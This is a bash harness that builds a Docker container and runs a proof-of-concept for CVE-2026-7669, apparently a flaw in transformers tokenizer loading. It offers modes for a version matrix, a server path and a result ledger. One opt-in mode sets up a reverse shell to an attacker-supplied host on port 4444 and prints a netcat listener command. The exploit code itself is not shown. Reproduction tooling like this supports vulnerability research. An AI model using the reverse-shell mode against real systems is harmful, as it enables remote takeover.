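#!/usr/bin/env bash
# CVE-2026-7669 PoC runner.
#
# Builds the Docker image from this directory and runs the PoC inside a
# container.
#
# Usage:
#   ./run.sh                      Full PoC (preflight + 4 phases + ledger).
#   ./run.sh --server             Reproduce via TokenizerManager init path.
#   ./run.sh --versions           Test transformers 5.0..5.5 matrix.
#   ./run.sh --revshell HOST      Opt-in reverse shell to HOST:4444.
#   ./run.sh --rebuild            Force --no-cache rebuild.
#   ./run.sh --copy-ledger PATH   Run then copy ledger to PATH.
#
# Environment:
#   REBUILD=1   Build with --no-cache in any mode.
#
# Isolation: every mode starts the container with plain `docker run` /
# `docker create`; this script passes no --network, mount or capability
# flags, so the container gets Docker's defaults.
# NOTE(review): modes other than --revshell may not need outbound network
# access. If the PoC phases run offline, adding `--network none` to those
# invocations would tighten isolation. Confirm against the Dockerfile and
# the PoC scripts before changing it.

set -euo pipefail

readonly IMAGE_TAG="cve-2026-7669"

SCRIPT_DIR="$(cd -- "$(dirname -- "$0")" && pwd)"
cd -- "$SCRIPT_DIR"

# Print the usage text. Kept as a here-doc so that --help does not depend on
# the line numbers of the header comment (the previous `sed -n '2,12p' "$0"`
# printed whatever happened to sit on those lines).
usage() {
  cat <<'EOF'
CVE-2026-7669 PoC runner.

Usage:
  ./run.sh                      Full PoC (preflight + 4 phases + ledger).
  ./run.sh --server             Reproduce via TokenizerManager init path.
  ./run.sh --versions           Test transformers 5.0..5.5 matrix.
  ./run.sh --revshell HOST      Opt-in reverse shell to HOST:4444.
  ./run.sh --rebuild            Force --no-cache rebuild.
  ./run.sh --copy-ledger PATH   Run then copy ledger to PATH.
EOF
}

# Preflight: both the docker CLI and a reachable daemon are required.
if ! command -v docker >/dev/null 2>&1; then
  echo "ERROR: docker not found in PATH." >&2
  exit 127
fi

if ! docker info >/dev/null 2>&1; then
  echo "ERROR: docker daemon not running." >&2
  exit 127
fi

#######################################
# Build the PoC image from the current directory.
# Globals:   IMAGE_TAG (read), REBUILD (read; "1" forces --no-cache)
# Outputs:   a banner plus the last three lines of the build log on stdout
# Returns:   non-zero if the build fails (pipefail propagates docker's status
#            through the `tail` pipeline, and `set -e` then aborts the script)
#######################################
build_image() {
  local -a build_args=(-t "$IMAGE_TAG")
  if [[ "${REBUILD:-0}" == "1" ]]; then
    build_args=(--no-cache "${build_args[@]}")
  fi

  echo "[*] Building $IMAGE_TAG ..."
  docker build "${build_args[@]}" . 2>&1 | tail -3
  echo
}

case "${1:-}" in
  --help | -h)
    usage
    exit 0
    ;;

  --rebuild)
    # Same as the default mode, but with a cache-less image build.
    export REBUILD=1
    build_image
    docker run --rm "$IMAGE_TAG"
    ;;

  --revshell)
    if [[ -z "${2:-}" ]]; then
      # The usage header documents the argument as HOST; the message used to
      # end after "--revshell " with the placeholder missing.
      echo "Usage: ./run.sh --revshell HOST" >&2
      exit 1
    fi
    echo "Listener: nc -lvnp 4444 on the attacker host first."
    build_image
    # HOST is handed to the container only as an environment variable; this
    # script does not interpolate it into any command line.
    docker run --rm -e ATTACKER_HOST="$2" -e ATTACKER_PORT=4444 "$IMAGE_TAG"
    ;;

  --server)
    build_image
    docker run --rm --entrypoint bash "$IMAGE_TAG" -c \
      "python3 setup_model.py && python3 test_server.py"
    ;;

  --versions)
    build_image
    docker run --rm --entrypoint bash "$IMAGE_TAG" -c \
      "python3 setup_model.py && python3 test_versions.py"
    ;;

  --copy-ledger)
    if [[ -z "${2:-}" ]]; then
      # Placeholder restored, as for --revshell above.
      echo "Usage: ./run.sh --copy-ledger PATH" >&2
      exit 1
    fi
    out_path="$2"
    build_image
    cid="$(docker create "$IMAGE_TAG")"
    # Remove the container on every exit path. Previously a failing
    # `docker cp` (e.g. the ledger was never written) aborted the script
    # under `set -e` before `docker rm` ran and left the container behind.
    trap 'docker rm -f "$cid" >/dev/null || true' EXIT
    # Best effort: the run's exit status is ignored so that the ledger can
    # still be copied out afterwards.
    docker start -ai "$cid" || true
    docker cp "$cid:/tmp/poc_claim_ledger.json" "$out_path"
    echo "[*] Ledger written to $out_path"
    ;;

  "")
    build_image
    docker run --rm "$IMAGE_TAG"
    ;;

  *)
    printf 'Unknown option: %s\n' "$1" >&2
    usage >&2
    exit 2
    ;;
esac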